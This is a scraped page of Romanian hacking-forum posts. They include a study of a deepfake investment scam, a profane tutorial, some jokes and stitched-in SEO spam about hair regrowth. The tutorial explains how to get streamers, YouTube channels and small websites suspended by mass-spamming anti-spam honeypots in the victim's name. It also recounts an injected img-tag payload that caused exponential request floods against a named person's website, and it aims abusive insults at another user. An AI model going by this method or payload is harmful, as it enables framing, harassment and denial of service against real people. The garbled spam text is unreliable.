firmei Intrebari precum: varsta, locul de munca, surse de venit, cetatenie, banca, buget Explicarea procesului Trimiterea unui mesaj pe WhatsApp cu link catre o platforma clonata la fel, 1:1 Generarea unui cont pe platforma respectiva si trimiterea acestuia prin WhatsApp Castigarea increderii Si desigur, plata prin card catre contul trimis prin WhatsApp Desi operatorii sunt instruiti sa fie prietenosi si sociabili, am observat ca se enerveaza foarte tare cand nu esti in stare sa scrii codul IBAN corect pentru a face plata, chiar nu inteleg de ce. Manipularea psihologica Tot procesul este unul amplu si bine gandit, textul de pe site-ul web fiind unul bine gandit cu scopul de a manipula oamenii. Putem observa in imaginea de mai jos cum se creeaza scenariul perfect pentru un atac de tip phishing. Gruparea incearca sa distraga omul prin creearea senzatiei de a rata oportunitatea vietii. De asemenea, in sectiunea falsa de comentarii, putem observa recenziile. Aceasta tehnica este folosita frecvent in campaniile de inselatorie, unde victimele sunt atrase prin recenzii false si promisiuni de castiguri rapide. Odata ce utilizatorii sunt convinsi de veridicitatea comentariilor, acestia devin tiinte sigure. Efectul de validare sociala joaca un rol crucial in acest proces. Comentariile pozitive creeaza o iluzie de incredere ceea ce ii face pe utilizatori mai predispusi sa pice in plasa escrocilor. Cum manipuleaza oamenii Odata furnizate datele pe domeniile fantoma, oamenii sunt sunati de catre un operator. Operatorii, conform recorder.ro aveau script-uri gata pregatite pentru a raspunde victimelor cu raspunsuri predefinite. Putem observa clar cum operatorii au raspunsurile pregatite pentru cele mai comune intrebari si raspunsuri date de clienti. Asta denota ca gruparea este una profesionista si bine pregatita, nu doar un simplu grup de oameni fara cunostinte. Dupa captarea atenției și câștigarea încrederii, acesta urmeaza sa introducă date precum: numele, email-ul si numarul de telefon. Astfel, la scurt timp dupa (maximum 24 ore, potrivit site-ului), o persoana implicata in gruparea infracțională te va suna sa te convinga de legitimitatea investiției si garantarea unui profit intr-un timp foarte scurt. Anonimizarea operatiunii Fiind o grupare infractionala bine organizata, acestia si-au luat masurile necesare pentru a-si asigura procesul de anonimizare minim. Regasim urmatoarele tehnici folosite. Anonimizarea datelor din registrele domeniilor ICANN care este o organizație non-profit responsabila pentru coordonarea și mentinerea stabilitatii si securitatii sistemului global de adrese IP si nume de domenii pe internet care este supusa in mod direct legii GDPR care protejeaza datele personale. Domeniile folosite de atacatori sunt cumparate de la namecheap, un comerciant care dupa implementarea GDPR in 2018 a creat serviciul withheldforprivacy, un serviciu menit sa mascheze datele reale ale detinatinatorului unui domeniu cu date generice. Asadar, informatii precum: nume, numar de telefon, adresa, mail sunt toate inlocuite cu unele generice. Numere spoofed Gruparea foloseste numere spoofed, adica atunci cand esti apelat de catre operator, numarul original este afisat ca fiind altul. Nu mare mi-a fost mirarea cand sunam inapoi la numarul operatorului, imi raspundeau persoane care nu aveau nici-o legatura cu operatiunea aceasta. Reclame non-stop Deoarece acestia stiau ca platformele mentionate vor depista rapid reclamele inselatoare, acestia generau sute de conturi si domenii dupa care promovau videoclipurile care utilizau deepfake incontinuu avand ca target de audienta persoane din Romania cu varste cuprinse intre 30-60 ani. Ce urmeaza? In urma convorbirilor si a pretextului ca vreau sa investesc, am reusit sa obtin de la un operator IBAN-ul contului in care urma sa virez suma(spoiler alert: n-am facut-o) Deoarece consider ca IBAN-ul este defapt a unei persoane pacalite la randul ei, nu am sa divulg IBAN-ul in mediul public. Parerea mea este ca grupul infractional nu a fost constituit doar din cele 12 persoane prinse si ca aceasta urmeaza sa isi desfasoarea activitatea in continuare. Am sa urmaresc in continuare acest caz iar daca alte date relevante apar am sa continui cu acest studiu.1 point
-
As vrea sa fac cumva sa prezint totul intr-o lumina super tehnica, dar adevarul este ca felul in care functioneaza internetul ne permite sa futem cu usurinta afacerile unor persoane care isi castiga veniturile din online. Metoda se aplica cu usurinta atat la streameri, cat si la conturi de pe retele sociale, YouTube, sau siteuri. Este blackhat, este muism, functioneaza de foarte multi ani si va mai functiona in continuare zeci de ani de acum inainte. Metoda este cunoscuta de o parte din vechiul staff RST si daca nu era mort forumul si eu nu as fi fost beat nu as fi postat asa ceva. Vedem daca si in zilele urmatoare o sa mai las tutorialul sau o sa cer stergerea lui. E-mail Spam. Aceasta este prima si cea mai usoara metoda. Testata in urma cu mult timp, testata relativ recent. Rata de succes aproape de 100% cu repercursiuni pe termen lung. Hai sa vedem despre ce este vorba. Sa spunem ca vrei sa inchizi un cont de streamer, un canal de YouTube, un cont de Facebook sau un site care nu are tld .ro. Pare cumva imposibil, mai ales in cazul conturilor de streameri sau de YouTube. Insa nivelul de dificultate este aproape mediu. Mediu inspre usor, pentru ca implica resurse minime pentrru cei priceputi si oleaca de creier. Ca sa fie clar pentru toata lumea, aceasta metoda a fost pentru prima data testata de mine in 2013 si se pare ca este valida si in ziua de azi. Specific ca a fost testata de mine in 2013 pentru ca este atat de simpla incat sigur mai exista cateva sute sau mii de persoane care o abuzeaza de ani de zile. Ce implica? Hai sa vedem. Luam ca exemplu un cont de streamer. Sa spunem ca il cheama Filviu Saiăr. Stim ca aceasta persoana monetizeaza atat pe Twitch cat si pe YouTube. Cele doua platforme au reguli bine definite in privinta spamului. Si daca nu ar avea, atata timp cat sunt "legit" (scuze pentru romgleza - muie @mannnu), tot se supun legislatiei in vigoare. Iar legislatia in vigoare din majoritatea tarilor spune ca nu ai voie sa spamezi in inboxurile oamenilor, pentru ca... sloboz la tava. Nu ai voie. Asa ca ce poate face un tampit care prinde boala pe un streamer? Sa trimita spam la cat mai multe adrese de mail cu mesajul: "Hei, eu sunt Filviu Saiăr. In fiecare saptamana intru pe Twitch si fac stream live pentru publicul meu. Am deja 1.000.000 de urmaritori. Intra si tu pe vvv.twitch.rst/filviusaiăr. Garantat o sa iti placa sa ma urmaresti. Si sa stii ca am si un canal de YouTube care poate fi gasit la adresa vvv.youtube.rst/filviusaiăr. Te astept si pe tine". Exemplul de mesaj este ipotetic, dar ati inteles ideea. Trebuie sa para ca acea persoana incearca sa se promoveze prin orice mijloace, inclusiv prin e-mail spam. Mailul trebuie sa para a fi legit, venit din partea acelei persoane, cu scopul de a o promova. Iar aici facem un salt la metoda "cum sa inchizi un website", dupa care revenim la ceea ce se intampla de fapt si de ce sansele ca aceste persoane sa fie afectate din cauza unui e-mail spam facut in numele lor sunt foarte foarte mari. Promit ca este simplu si promit ca este oarecum amuzant cand veti intelege cat de varza functioneaza legislatia nescrisa a internetului. O sa scriu succint cateva reguli care se aplica pentru ca aceasta metoda sa aiba succes: 1. nu trebuie sa fie un tld .ro 2. nu trebuie sa fie un tld vandut de ROTLD Clarificare: pe romani ii doare la banana de spamul in mail. Daca vei cumpara un domeniu .ro sau orice alt domeniu vandut de ROTLD (este irelevant daca este vandut de ROMARG sau alti selleri), este nevoie sa ti se deschida dosar penal pentru ca domeniul sa fie inchis, sau confiscat de autoritatile romane. Pentru a se intampla asta trebuie sa faci frauda cu acel domeniu, sau sa vinzi produse contrafacute. Cel putin asa era pana acum 4-5 ani. Nu cred ca s-a schimbat ceva intre timp (muie @mannnu - sa iti iau toata familia in pula). Deci, daca vorbim despre un domeniu .com, .net, .org etc atata timp cat trimitem spam exista sanse mari ca acel domeniu sa fie inchis. Care este logica? Logica din urma cu cativa ani era ca Spamhaus se ocupa de spamul in e-mail (colaborau cel putin cu Yahoo Mail), si cand acestia trimiteau notificare catre registrar si providerul de hosting, ori unul, ori altul luau masuri (atata timp cat nu era bulletproof hosting). In ziua de azi nu stiu daca Spamhaus mai au o influenta atat de mare, insa stiu ca in continuare cine este prins ca trimite e-mail spam poate avea probleme. Iar aici intervine, cred eu, problema cu honeypots. O sa va prezint varianta simplificata a intregului flow folosit de companiile care se ocupa cu combaterea spamului si cums e creeaza honeypots. 1. Se creeaza adrese de mail pe toate platformele de e-mail gratuit 2. E-mailurile respective sunt verificate si analizate zilnic de robotii companiilor cu servicii anti-spam 3. Mailurile care sunt dovedite a fi spam intra intr-un flow de: raportare la hosting, raportare la registrarul de domenii, introducere in blacklist. Sau se adauga pe unele siteuri adrese de mail ale companiilor care ofera servici anti-spam si cand le crawleaza cineva si le spameaza adresele de mail incep sa se ia masuri. Nu cred ca metoda asta mai este de actualitate. Nu este obligatoriu ca toate companiile cu servicii anti-spam sa procedeze fix cum am descris mai sus, dar in general cam astia sunt pasii. Punem accent pe raportare la registrarul de domenii si introducere in blacklist. In ziua de azi nu cred ca se duc direct la hosting. @aelius care ofera servicii de hosting ar putea sa ma corecteze unde gresesc pentru ca este mai familiarizat decat mine cu tot flowul asta. Acum revenim la intreaga imagine de ansamblu. Nici o platforma de streaming, de video hosting, de website hosting, nu isi doreste ca ip-urile sa fie listate ca fiind "spammy". Asa ca ori de cate ori cineva abuzeaza de "e-mail marketing" si exista reclamatii incep sa ia masuri. Dar pentru a se lua masuri coercitive trebuie ca mailurile de tip "spam" sa ajunga la un inbox de tip honeypot, pentru ca mai departe sa se ocupe de raportare compania care se ocupa de blacklistul antispam. Masurile coercitive ale registrarului consta in suspendarea domeniului, iar in cazul providerilor de hosting se ajunge la suspendarea serviciilor de hosting. Pe vremuri ne foloseam de Spamhaus ca sa ajungem la aceste rezultate pentru ca erau foarte influenti. Acum nu stiu ce putere mai are Spamhaus, dar stiu ca in cazul reclamatiilor de spam atat hostingul cat si registrarul (daca sunt servicii serioase), cat si platformele de streaming/video hosting, iau masuri cand primesc reclamatii pentru e-mail spam. In cazul providerilor de hosting exista doua metode pentru a le influenta deciziile: - spam in e-mail - DOS/DDOS pe domeniul hostat de ei Imi amintesc cu zambetul pe buze (futu-ti mortii ma-tii @mannnu), cum in 2013 Slick mi-a facut un programel care imi permitea sa modific pachetele RTMP folosite de Adobe flash. Aveam un chat din UK care folosea pachete RTMP, chat pe care il abuzam folosind taguri html de tipul <img src="https://www.domeniu.com:3306" />. Cand trimiteam in chatul respectiv acea sintaxa html de fiecare data cand cineva scria un mesaj pe chat se faceau exponential requesturi de la cei care foloseau Firefox, pentru ca in plugin-container.exe (proces folosit de Firefox pentru Adobe Flash), nu se incheia sesiunea decat la restartul pc-ului, nu si la inchiderea browserului sau a tabului. Practic daca scria cineva pe chat imediat dupa ce injectam html-ul cu imagine, fiecare utilizator de Firefox prezent pe chat facea un request, apoi la urmatorul mesaj - scris de oricine - pe chat se faceau doua requesturi, apoi la urmatorul mesaj 4 requesturi, la urmatorul 8 requesturi s.a.m.d.. Am descoperit bug-ul din intamplare si nu a fost niciodata facut public. Manca la banda ca la balamuc. A murit odata cu Adobe Flash si acum regret ca nu l-am raportat ca sa fac niste $$$ sa imi cumpar Urus. Unde vreau sa ajung este ca la siteuri cu shared hosting si cu limita de resurse, astfel de requesturi pica baza de date a tuturor siteurilor hostate pe acel server, sau intreg hostingul avea banda de net fututa la maxim, iar la cateva ore de la inceperea atacului compania de hosting suspenda site-ul respectiv si il trimitea pe owner in pizda ma-sii in 90% din cazuri. Florin Grozea de la Hi-Q a simtit asta pe pielea lui cand i-am aplicat metoda asta pe siteul floringrozea punct com. Alte clarificari: nu va asteptati sa inchideti domenii de tip amazon punct com. Functioneaza pe domenii normale, de oameni normali, sau de afaceri micute. In cazul creatorilor de content sau al streamerilor va functiona oricat de mare este numarul lor de urmaritori, dar trebuie sa bombardati honeypot-urile serviciilor anti-spam pe termen mai lung. Si cum este, cred eu, imposibil sa aflati care sunt adresele e-mail de tip honeypot, va trebui sa spamati constant un numar mai mare de mailuri (cam 100.000) ca sa aveti rezultatele dorite. Cine are resurse pentru spam poate face asta cu usurinta, dar in general nu o va face pentru ca nu aduce profit financiar. Un copil care vrea sa inchida contul unui streamer care i-a dat ban, nu are resursele necesare pentru a duce planul la bun sfarsit. Cam atat despre subiectul asta. Sa imi bag pula in mortii ma-tii @mannnu. Uite ca oricat de zmeu te crezi imi sugi pula. Bine ai venit pe internet, luati-as familia in pula.1 point
-
Teaser urmatorul sezon: Laviniu revine in forta pe forum si ne explica cum a zburat cu avionul privat in Bali pentru a cumpara o insula unde sa isi petreaca vacanta anul asta. Ajunge la concluzia ca Urus este pentru saraci; isi cumpara 6 supercars, toate roz. @mannnu afla ca a fost inselat de Laviniu si ca a luat hiv de la el.1 point
-
Își bat ăștia bătrâni pla de voi într-un mod magistral1 point
-
Man in the middle nu se face chiar asa usor, trebuie sa fii in aceeasi retea cu victima (e.g. acelasi WiFi) si chiar si asa, browserele si alte aplicatii verifica certificatele TLS si nu prea ai ce face. Daca e vorba de parola altei persoane, nu ai nevoie de ea.1 point
-
Vpossible top high quality necessary proteins without having some excessive undesirable human additional fat from the dairy. They are some examples on how you can help improving the locks normally through controlling what you eat strategy. The factors you should eat as many variations of foods as you can is to guarantee that you will get the nutrition for the locks as well as your whole individual human body. A comprehensive weight rejuvalex hair regrowth formula loss needed to keep the locks more healthy in organic way. Do you have any problems with locks loss? Have you tried so several factors but there is no beneficial impact on the locks growth? Probably, you should try one of the best locks essentials for locks growth: Protein. Yes, Protein. Many individuals do not believe that the best choices for losing of locks is very simple. Protein can be found everywhere in the retailer or pharmacy store. These days, I will share one of my best recommendations on improving the locks by consuming enough necessary proteins in what you eat strategy. Protein is the best and easiest source that you can find out to increase the locks. This is because very simple because necessary proteins is organic component we need most for our wellness insurance wellness and fitness and wellness insurance fitness. For improving the locks, necessary proteins will help you building up the locks framework and improving your development and development of hir amount. Rejuvalex hair regrowth formula framework is built up by many aminoacids from your whole individual human body for developing the locks more healthy. So if you are deficiency of necessary proteins in your whole individual human body, you will probably experience locks1 point
-
Am o sugestie pentru Andrei Avadanei. Toată lumea știe că defcon-urile sunt pentru white hat hacking și diversi corporatiști care lucrează în cyber defence. Niciun un black hat real nu s-ar duce la o astfel de conferință să vorbească despre ce botnet, malware sau exploit a făcut/ creat. Sugestia mea este să facă primul defcon online pentru black hat hacking. Să invite hackerii black hat să-și spună spuna experientele. Videourile pot fi narate cu ajutorul inteligenței artificiale și trimise prin Tor. Cred că ceva de genul ar câștiga popularitate și ar fi foarte urmărite. Să înveți de la cei mai buni, cum gândesc, cum au făcut, ce au greșit, ce regretă.0 points